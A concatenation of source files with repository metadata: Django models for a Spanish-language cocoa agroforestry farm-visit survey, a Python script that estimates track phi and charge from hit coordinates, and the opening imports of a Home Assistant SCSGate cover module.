observacion8 = models.IntegerField(choices=CHOICE_SAF_OBSERVACION_2_5,
verbose_name='2.5 ¿Cómo es el arreglo de la plantación?')
observacion9 = models.IntegerField(choices=CHOICE_SAF_OBSERVACION_2_6,
verbose_name='2.6 ¿Qué dificultades le ha generado su diseño actual de plantación de cacao?')
observacion10 = models.IntegerField(choices=CHOICE_SAF_OBSERVACION_2_7,
verbose_name='2.7 ¿Cuál sería el diseño para mejorar el sistema agroforestal cacao? ')
observacion11 = MultiSelectField(choices=CHOICE_SAF_OBSERVACION_2_8,
verbose_name='2.8 ¿Por qué toma la decisión de establecer el diseño seleccionado?')
ficha = models.ForeignKey(FichaSaf)
def __unicode__(self):
return u"Observacion 2.5 al 2.8"
#--------------------- fin ficha saf -----------
#---------------------- Ficha Cierre -----------
class FichaCierre(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_cierre')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_cierre')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha cierre"
verbose_name_plural = "Ficha cierre"
CHOICE_CIERRE_1_1_IMPACTO = (
('A', 'Tipo de árboles y cantidad'),
('B', 'Mucha sombra de los árboles'),
('C', 'Poca sombra de los árboles'),
('D', 'Efecto de sombra sobre las plagas y enfermedades'),
('E', 'Efecto de sombra sobre la producción'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_1_PLANIFICADA = (
('A', 'Regulación de sombra'),
('B', 'Eliminación de árboles'),
('C', 'Sembrar árboles'),
('D', 'Eliminar musaceas'),
('E', 'Sembrar musaceas y sombra temporal'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_1_REALIZADA = (
('A', 'Regulación de sombra'),
('B', 'Eliminación de árboles'),
('C', 'Sembrar árboles'),
('D', 'Eliminar musaceas'),
('E', 'Sembrar musaceas y sombra temporal'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_1_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Mejor control de malas hierbas'),
('C', 'Reducción de enfermedades'),
('D', 'Eliminar musaceas'),
('E', 'Ninguna'),
)
class CierreManejo1(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_1_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_1_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_1_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_1_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.1"
class Meta:
verbose_name='1.1 Sombra'
verbose_name_plural='1.1 Sombra'
CHOICE_CIERRE_1_2_IMPACTO = (
('A', 'Altura y ancho de plantas de cacao'),
('B', 'Falta de horquetas'),
('C', 'Muchas ramas bajeras y entrecruzadas'),
('D', 'Poca penetración de luz'),
('E', 'Relación entre poda y productividad'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_2_PLANIFICADA = (
('A', 'Descope de las plantas'),
('B', 'Poda de las ramas entrecruzadas'),
('C', 'Eliminar los chupones'),
('D', 'Formar horquetas'),
('E', 'Eliminar ramas bajeras'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_2_REALIZADA = (
('A', 'Descope de las plantas'),
('B', 'Poda de las ramas entrecruzadas'),
('C', 'Eliminar los chupones'),
('D', 'Formar horquetas'),
('E', 'Eliminar ramas bajeras'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_2_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Mejor entrada de luz'),
('C', 'Reducción de enfermedades'),
('D', 'Ninguna'),
)
class CierreManejo2(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_2_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_2_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_2_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_2_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.2"
class Meta:
verbose_name='1.2 Poda'
verbose_name_plural='1.2 Poda'
CHOICE_CIERRE_1_3_IMPACTO = (
('A', 'Falta de obra de conservación'),
('B', 'Falta de obra de drenaje'),
('C', 'Deficiencia o desbalance de nutrientes'),
('D', 'Estado de fertilidad de suelo'),
('E', 'Relación entre suelo, fertilidad y la productividad'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_3_PLANIFICADA = (
('A', 'Aplicar abono orgánicos'),
('B', 'Aplicar abono mineral'),
('C', 'Aplicar Cal o Ceniza'),
('D', 'Abonar según datos de análisis'),
('E', 'Sembrar abono verde y cobertura'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_3_REALIZADA = (
('A', 'Aplicar abono orgánicos'),
('B', 'Aplicar abono mineral'),
('C', 'Aplicar Cal o Ceniza'),
('D', 'Abonar según datos de análisis'),
('E', 'Sembrar abono verde y cobertura'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_3_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Aumento de la floración'),
('C', 'Reducción de enfermedades'),
('D', 'Abonar según datos de análisis'),
('E', 'Ninguna'),
)
class CierreManejo3(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_3_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_3_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_3_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_3_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.3"
class Meta:
verbose_name='1.3 Suelo'
verbose_name_plural='1.3 Suelo'
CHOICE_CIERRE_1_4_IMPACTO = (
('A', 'Variedad de plagas y enfermedades'),
('B', 'Nivel de daño de plagas y enfermedades'),
('C', 'Relación entre poda , plagas y enfermedades'),
('D', 'Relación entre sombra y plagas y enfermedades'),
('E', 'Impacto de plagas y enfermedades sobre producción'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_4_PLANIFICADA = (
('A', 'Realizar recuentos'),
('B', 'Mejorar la sombra'),
('C', 'Mejorar la poda'),
('D', 'Eliminar mazorcas enfermas'),
('E', 'Aplicar caldo sulfo-calcico'),
('F', 'Aplicar bio-fermentados'),
('G', 'Ninguna'),
('H', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_4_REALIZADA = (
('A', 'Realizar recuentos'),
('B', 'Mejorar la sombra'),
('C', 'Mejorar la poda'),
('D', 'Eliminar mazorcas enfermas'),
('E', 'Aplicar caldo sulfo-calcico'),
('F', 'Aplicar bio-fermentados'),
('G', 'Ninguna'),
('H', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_4_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Reducción de daño de plagas'),
('C', 'Reducción de enfermedades'),
('D', 'Ninguna'),
)
class CierreManejo4(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_4_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_4_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_4_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_4_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.4"
class Meta:
verbose_name='1.4 Plaga'
verbose_name_plural='1.4 Plaga'
CHOICE_CIERRE_1_5_IMPACTO = (
('A', 'Variedad de mala hierbas'),
('B', 'Nivel de daño de mala hierbas'),
('C', 'Relación entre chapoda y composición del piso'),
('D', 'Relación entre herbicidas y composición del piso'),
('E', 'Cantidad de bejucos en el piso y plantas'),
('F', 'Ninguna'),
('G', 'Falta de materia organica'),
)
CHOICE_CIERRE_1_5_PLANIFICADA = (
('A', 'Realizar conteo'),
('B', 'Mejorar la sombra'),
('C', 'Eliminar bejucos'),
('D', 'Eliminar tanda'),
('E', 'Realizar manejo selectivo'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
('H', 'Repartir hojarasca'),
)
CHOICE_CIERRE_1_5_REALIZADA = (
('A', 'Realizar conteo'),
('B', 'Mejorar la sombra'),
('C', 'Eliminar bejucos'),
('D', 'Eliminar tanda'),
('E', 'Realizar manejo selectivo'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
('H', 'Repartir hojarasca'),
)
CHOICE_CIERRE_1_5_RESULTADOS = (
('A', 'Aumento de producción'),
('B', 'Reducción de malas hierbas dañinas'),
('C', 'Aumento de cobertura'),
('D', 'Eliminar tanda'),
('E', 'Ninguna'),
)
class CierreManejo5(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_5_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_5_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_5_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_5_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.5"
class Meta:
verbose_name='1.5 Piso'
verbose_name_plural='1.5 Piso'
CHOICE_CIERRE_1_6_IMPACTO = (
('A', 'Tipo de cacao que estamos sembrando'),
('B', 'Auto-incompatibilidad de las semillas'),
('C', 'La calidad de semillas'),
('D', 'Incidencia de plagas y enfermedades en vivero'),
('E', 'Calidad de plantas'),
('F', 'Ninguna'),
)
CHOICE_CIERRE_1_6_PLANIFICADA = (
('A', 'Seleccionar mazorcas y mezclar para conseguir semilla'),
('B', 'Utilizar mejor calidad de semillas'),
('C', 'Mejorar el sustrato'),
('D', 'Mejorar el tamaño de bolsa'),
('E', 'Mejorar manejo de enfermedades y plagas'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_6_REALIZADA = (
('A', 'Seleccionar mazorcas y mezclar para conseguir semilla'),
('B', 'Utilizar mejor calidad de semillas'),
('C', 'Mejorar el sustrato'),
('D', 'Mejorar el tamaño de bolsa'),
('E', 'Mejorar manejo de enfermedades y plagas'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_6_RESULTADOS = (
('A', 'Mejor vigor de las plantas'),
('B', 'Menos daño de plagas'),
('C', 'Menos daño de enfermedades'),
('D', 'Ninguna'),
)
class CierreManejo6(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_6_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_6_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_6_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_6_RESULTADOS,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.6"
class Meta:
verbose_name='1.6 Vivero'
verbose_name_plural='1.6 Vivero'
CHOICE_CIERRE_1_7_IMPACTO = (
('A', 'Cantidad de planta productiva'),
('B', 'Numero de mazorcas sanas'),
('C', 'Numero de mazorcas dañadas'),
('D', 'Nivel de cosecha de la parcela'),
('E', 'Ninguna'),
('F', 'Efecto de sombra sobre la producción'),
('G', 'Efecto de poda sobre la producción'),
)
CHOICE_CIERRE_1_7_PLANIFICADA = (
('A', 'Mejorar la poda y sombra'),
('B', 'Mejorar la fertilización'),
('C', 'Mejorar manejo de plagas'),
('D', 'Eliminar planta poca productivas'),
('E', 'Sembrar plantas más productivas'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_7_REALIZADA = (
('A', 'Mejorar la poda y sombra'),
('B', 'Mejorar la fertilización'),
('C', 'Mejorar manejo de plagas'),
('D', 'Eliminar planta poca productivas'),
('E', 'Sembrar plantas más productivas'),
('F', 'Ninguna'),
('G', 'Ninguna por falta de recursos'),
)
CHOICE_CIERRE_1_7_RESULTADO = (
('A', 'Aumento de la cosecha'),
('B', 'Aumento de plantas productivas'),
('C', 'Mejor calidad de mazorcas'),
('D', 'Mejor calidad de granos'),
('E', 'Ninguna'),
)
class CierreManejo7(models.Model):
campo1 = MultiSelectField(choices=CHOICE_CIERRE_1_7_IMPACTO,
verbose_name='Observación que impacto')
campo2 = MultiSelectField(choices=CHOICE_CIERRE_1_7_PLANIFICADA,
verbose_name='Acciones planificadas')
campo3 = MultiSelectField(choices=CHOICE_CIERRE_1_7_REALIZADA,
verbose_name='Acciones realizadas')
campo4 = MultiSelectField(choices=CHOICE_CIERRE_1_7_RESULTADO,
verbose_name='Resultados obtenidos', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"1.7"
class Meta:
verbose_name='1.7 Cosecha'
verbose_name_plural='1.7 Cosecha'
CHOICE_CIERRE_COSTO_1 = (
('A', 'Cacao Criollo'),
('B', 'Cacao Trinitario'),
('C', 'Cacao Forastero'),
('D', 'Cacao híbrido'),
('E', 'Clones de cacao'),
)
class CierreCosto1(models.Model):
costo = models.FloatField('Costo de mano de obra C$/día')
area = models.FloatField('Área de parcela de cacao en mz')
tipo = MultiSelectField(choices=CHOICE_CIERRE_COSTO_1,
verbose_name='Tipo de Cacao ')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"2"
class ActividadesCierre(models.Model):
nombre = models.CharField(max_length=250)
def __unicode__(self):
return self.nombre
class Meta:
verbose_name_plural='Actividades de cierre'
class CierreActividad(models.Model):
actividad = models.ForeignKey(ActividadesCierre)
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses realizan')
familiar = models.FloatField('Uso de DP familiar')
contratada = models.FloatField('Uso de DP contratada')
insumo = models.CharField('Uso Insumo', max_length=250)
costo = models.FloatField('Costo de insumo en C$')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"2.1"
class CierreBabaRoja(models.Model):
campo1 = models.FloatField('Cosecha anual qq baba', null=True, blank=True)
campo2 = models.FloatField('Venta qq baba', null=True, blank=True)
campo3 = models.FloatField('Precio de venta qq baba', null=True, blank=True)
campo4 = models.FloatField('Cosecha anual qq grano rojo', null=True, blank=True)
campo5 = models.FloatField('Venta qq grano rojo', null=True, blank=True)
campo6 = models.FloatField('Precio de venta qq grano rojo', null=True, blank=True)
campo7 = models.FloatField('Consumo anual qq grano rojo', null=True, blank=True)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"2.2"
class Meta:
verbose_name='Datos'
verbose_name_plural='Datos'
class ManejosCierre(models.Model):
nombre = models.CharField(max_length=250)
def __unicode__(self):
return self.nombre
class Meta:
verbose_name_plural='Manejos de cierre'
class CierreManejo(models.Model):
manejo = models.ForeignKey(ManejosCierre)
reposo = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
crecimiento = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
floracion = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
cosecha = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"3"
CHOICE_CIERRE_CONOCIMIENTO_TEMA1 = ((1, 'Variedad más común en mi finca'),)
class CierreConocimiento1(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_CONOCIMIENTO_TEMA1)
criollas = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
forastero = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
trinitaria = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
hibridos = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
clones = models.IntegerField(choices=((1,'Si'),(2,'No'),) )
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 tema 1"
CHOICE_CIERRE_CONOCIMIENTO_TEMA2 = ((1, 'Ventajas de variedades'),)
CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS = (
('A', 'Produce más'),
('B', 'Granos grandes'),
('C', 'Tolerante a plagas y enfermedades'),
('D', 'Tiene buena estructura'),
('E', 'No necesita mucho abono'),
('F', 'No aplica'),
)
class CierreConocimiento2(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_CONOCIMIENTO_TEMA2)
criollas = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
forastero = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
trinitaria = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
hibridos = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
clones = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 tema 2"
CHOICE_CIERRE_CONOCIMIENTO_TEMA3 = ((1, 'Desventajas de variedades'),)
CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3 = (
('A', 'Produce poco'),
('B', 'Granos menudos'),
('C', 'Susceptible a plagas y enfermedades'),
('D', 'No tiene buena estructura'),
('E', 'Necesita mucho abono'),
('F', 'No aplica'),
)
class CierreConocimiento3(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_CONOCIMIENTO_TEMA3)
criollas = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
forastero = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
trinitaria = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
hibridos = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
clones = MultiSelectField(choices=CHOICE_CIERRE_CONOCIMIENTO_RESPUESTAS3)
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 tema 3"
CHOICE_CIERRE_SUELO_TEMA1 = ((1, 'Que elementos aportan'),)
CHOICE_CIERRE_SUELO_RESPUESTAS1 = (
('A', 'Nitrógeno'),
('B', 'Fósforo'),
('C', 'Potasio'),
('D', 'Calcio'),
('E', 'Magnesio'),
('F', 'No aplica'),
)
class CierreSuelo1(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_SUELO_TEMA1)
abono = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS1,
verbose_name='Abono verde y coberturas')
hojarasca = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS1,
verbose_name='Hojarasca de los árboles')
organico = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS1,
verbose_name='Abono orgánico')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .2 tema 1"
CHOICE_CIERRE_SUELO_TEMA2 = ((1, 'Ventajas de esta práctica'),)
CHOICE_CIERRE_SUELO_RESPUESTAS2 = (
('A', 'Fácil de implementar'),
('B', 'De bajo costo'),
('C', 'No necesita mucha inversión'),
('D', 'No necesita mucha mano de obra'),
('E', 'Aporta al desarrollo de las plantas'),
('F', 'No aplica'),
)
class CierreSuelo2(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_SUELO_TEMA2)
abono = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS2,
verbose_name='Abono verde y coberturas')
hojarasca = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS2,
verbose_name='Hojarasca de los árboles')
organico = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS2,
verbose_name='Abono orgánico')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .2 tema 2"
CHOICE_CIERRE_SUELO_TEMA3 = ((1, 'Desventajas de variedades'),)
CHOICE_CIERRE_SUELO_RESPUESTAS3 = (
('A', 'Difícil de implementar'),
('B', 'Alto costo'),
('C', 'Necesita mucha inversión'),
('D', 'Necesita mucha mano de obra'),
('E', 'No aporta al desarrollo de las plantas'),
('F', 'No aplica'),
)
class CierreSuelo3(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_SUELO_TEMA3)
abono = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS3,
verbose_name='Abono verde y coberturas')
hojarasca = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS3,
verbose_name='Hojarasca de los árboles')
organico = MultiSelectField(choices=CHOICE_CIERRE_SUELO_RESPUESTAS3,
verbose_name='Abono orgánico')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .2 tema 3"
CHOICE_CIERRE_PLAGA_TEMA1 = ((1, 'Nivel de daño en la parcela'),
(2, 'Nivel de daño en las fincas vecinas'),)
class CierrePlaga1(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_PLAGA_TEMA1)
monilla = models.FloatField()
mazorca = models.FloatField('Mazorca Negra')
zompopos = models.FloatField()
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .3 tema 1"
CHOICE_CIERRE_PLAGA_TEMA2 = ((1, 'Prácticas para prevenir'),)
CHOICE_CIERRE_PLAGA_RESPUESTAS2 = (
('A', 'Eliminar mazorcas enfermas'),
('B', 'Realizar poda'),
('C', 'Manejo de sombra'),
('D', 'Abonar las plantas'),
('E', 'Buen manejo de piso'),
('F', 'No aplica'),
)
CHOICE_CIERRE_PLAGA_RESPUESTAS_ZOMPOPO = (
('A', 'Eliminar zompoperas'),
('B', 'Realizar caseo'),
('C', 'Sembrar plantas repelentes'),
('D', 'Utilizar cal o ceniza'),
('E', 'Buen manejo de piso'),
('F', 'No aplica'),
)
class CierrePlaga2(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_PLAGA_TEMA2)
monilla = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS2,
verbose_name='Monilla')
mazorca = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS2,
verbose_name='Mazorca Negra')
zompopos = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS_ZOMPOPO,
verbose_name='Zompopos')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .3 tema 2"
CHOICE_CIERRE_PLAGA_TEMA3 = ((1, 'Prácticas para controlar'),)
CHOICE_CIERRE_PLAGA_RESPUESTAS3 = (
('A', 'Aplicar caldo sulfo-calcico'),
('B', 'Aplicar fungicidas'),
('C', 'No aplica'),
)
CHOICE_CIERRE_PLAGA_RESPUESTAS_ZOMPOPO3 = (
('A', 'Aplicar venenos en las zompoperas'),
('B', 'Proteger las plantas con plástico'),
('C', 'No aplica'),
)
class CierrePlaga3(models.Model):
tema = models.IntegerField(choices=CHOICE_CIERRE_PLAGA_TEMA3)
monilla = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS3,
verbose_name='Monilla')
mazorca = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS3,
verbose_name='Mazorca Negra')
zompopos = MultiSelectField(choices=CHOICE_CIERRE_PLAGA_RESPUESTAS_ZOMPOPO3,
verbose_name='Zompopos')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"4 .3 tema 3"
CHOICE_CIERRE_CICLO_TRABAJO1_RESPUESTA = (
(1, 'Mucho'),
(2, 'Algo'),
(3, 'Poco'),
(4, 'Nada '),
)
CHOICE_CIERRE_CICLO_TRABAJO2_RESPUESTA = (
(1, 'Todas'),
(2, 'Algunas'),
(3, 'Pocas'),
(4, 'Ninguna'),
)
CHOICE_CIERRE_CICLO_TRABAJO3_RESPUESTA = (
(1, 'Demasiada visitas'),
(2, 'Adecuadas visitas'),
(3, 'Pocas visitas'),
)
CHOICE_CIERRE_CICLO_TRABAJO4_RESPUESTA = (
(1, 'Demasiada larga'),
(2, 'Adecuado tiempo '),
(3, 'Muy corta'),
)
CHOICE_CIERRE_CICLO_TRABAJO5_RESPUESTA = (
(1, 'Si y con mucho ánimo'),
(2, 'Si pero con poco ánimo'),
(3, 'Si porque siento obligado'),
(4, 'No quiero seguir'),
)
class CierreCicloTrabajo(models.Model):
pregunta1 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO1_RESPUESTA,
verbose_name='¿Las visitas que hemos realizados han servido para aprender nuevas cosas? ')
pregunta2 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO1_RESPUESTA,
verbose_name='¿Las visitas que hemos realizados han servido para observar sobre diferentes aspectos de la parcela de cacao? ')
pregunta3 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO1_RESPUESTA,
verbose_name='¿Las observaciones y discusiones han servido para mejorar el manejo de las parcela de cacao?')
pregunta4 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO2_RESPUESTA,
verbose_name='¿Han podido implementar las acciones que se acordaron a partir de las visitas?')
pregunta5 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO3_RESPUESTA,
verbose_name='¿Qué piensa sobre la frecuencia de las visitas?')
pregunta6 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO4_RESPUESTA,
verbose_name='¿Qué piensa sobre el tiempo que dura cada visita?')
pregunta7 = models.IntegerField(choices=CHOICE_CIERRE_CICLO_TRABAJO5_RESPUESTA,
verbose_name='¿Quiere seguir trabajando con las visitas para el segundo ciclo?')
pregunta8 = models.IntegerField(choices=((1,'Si'),(2,'No'),),
verbose_name='Estaría usted interesado organizar un día de campo en su finca para que otras y otros productores vengan a visitar la parcela?')
pregunta9 = models.TextField('¿Qué sugiere para mejorar el trabajo de este ciclo?')
ficha = models.ForeignKey(FichaCierre)
def __unicode__(self):
return u"5 ciclo de trabajo"
| mit | 5,736,390,111,348,182,000 | 37.740102 | 166 | 0.538431 | false | 3.342004 | false | false | false |
lstorchi/pca_fit | utilities/estimate_phi_and_charge.py | 1 | 2929 | import numpy
import math
import sys
import re
from scipy import stats
####################################################################
def file_len(fname):
with open(fname) as f:
for i, l in enumerate(f):
pass
return i + 1
####################################################################
filename = "noname.txt"
if (len(sys.argv) == 1):
print >> sys.stderr, "usage: ", sys.argv[0], " filename.txt"
exit(1)
else:
filename = sys.argv[1]
numofline = file_len(filename)
fp = open(filename, "r")
# jump first line
fp.readline()
phidiffvalues = []
x = []
y = []
for i in range(numofline):
l = fp.readline()
if not l:
break
p = re.compile(r'\s+')
line = p.sub(' ', l)
line = line.lstrip()
line = line.rstrip()
plist = line.split(" ")
numof = int(plist[1])
zval = numpy.zeros(numof)
rval = numpy.zeros(numof)
zval13 = numpy.zeros(numof)
rval13 = numpy.zeros(numof)
phival = numpy.zeros(numof)
charge = 0.0
layersids = ""
for j in range(numof):
coordline = fp.readline()
coordline = p.sub(' ', coordline)
coordline = coordline.lstrip()
coordline = coordline.rstrip()
coordlinelist = coordline.split(" ")
layersids += coordlinelist[3]
pid = int(coordlinelist[7])
if (pid > 0):
charge = 1.0
else:
charge = -1.0
xi = float(coordlinelist[0])
yi = float(coordlinelist[1])
zi = float(coordlinelist[2])
ri = math.sqrt(math.pow(xi, 2.0) + math.pow (yi, 2.0))
phii = math.atan2(yi, xi)
rval[j] = ri
phival[j] = phii
zval[j] = zi
if (j < 3):
rval13[j] = ri
zval13[j] = zi
paramline = fp.readline()
paramline = p.sub(' ', paramline)
paramline = paramline.lstrip()
paramline = paramline.rstrip()
paramlinelist = paramline.split(" ")
pt = float(paramlinelist[0])
phi = float(paramlinelist[1])
eta = float(paramlinelist[3])
z0 = float(paramlinelist[4])
theta = 2.0 * math.atan (math.exp(-eta))
pz = pt * math.cos(theta)
# quick check for layers id
if (layersids != "5678910"):
print >> sys.stderr, "Wrong seq: ", layersids
else:
if pt >= 3.0:
print "RZPhi plane using layers 1 and 6: "
slope = (phival[5]-phival[0])/(rval[5]-rval[0])
print "layers 1 6 c/pt: ", charge/pt, " slope: ", slope
y.append(charge/pt)
x.append(slope)
intercept = phival[0] - slope*rval[0]
print "layers 1 6 phi: ", phi, " intercept: ", intercept, " diff: ", phi-intercept
phidiffvalues.append(phi-intercept)
print "phi layers 1 6: "
print "Num of events: ", len(phidiffvalues)
print "Mean val: ", numpy.mean(phidiffvalues)
print "STD val: ", numpy.std(phidiffvalues)
slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)
print "Lin Regr slope, intercept, r_value, p_value, std_err"
print slope, intercept, r_value, p_value, std_err
fp.close()
| apache-2.0 | 1,603,819,680,319,063,300 | 20.536765 | 90 | 0.576989 | false | 3.019588 | false | false | false |
molobrakos/home-assistant | homeassistant/components/scsgate/cover.py | 7 | 2704 | """Support for SCSGate covers."""
import logging
import voluptuous as vol
from homeassistant.components import scsgate
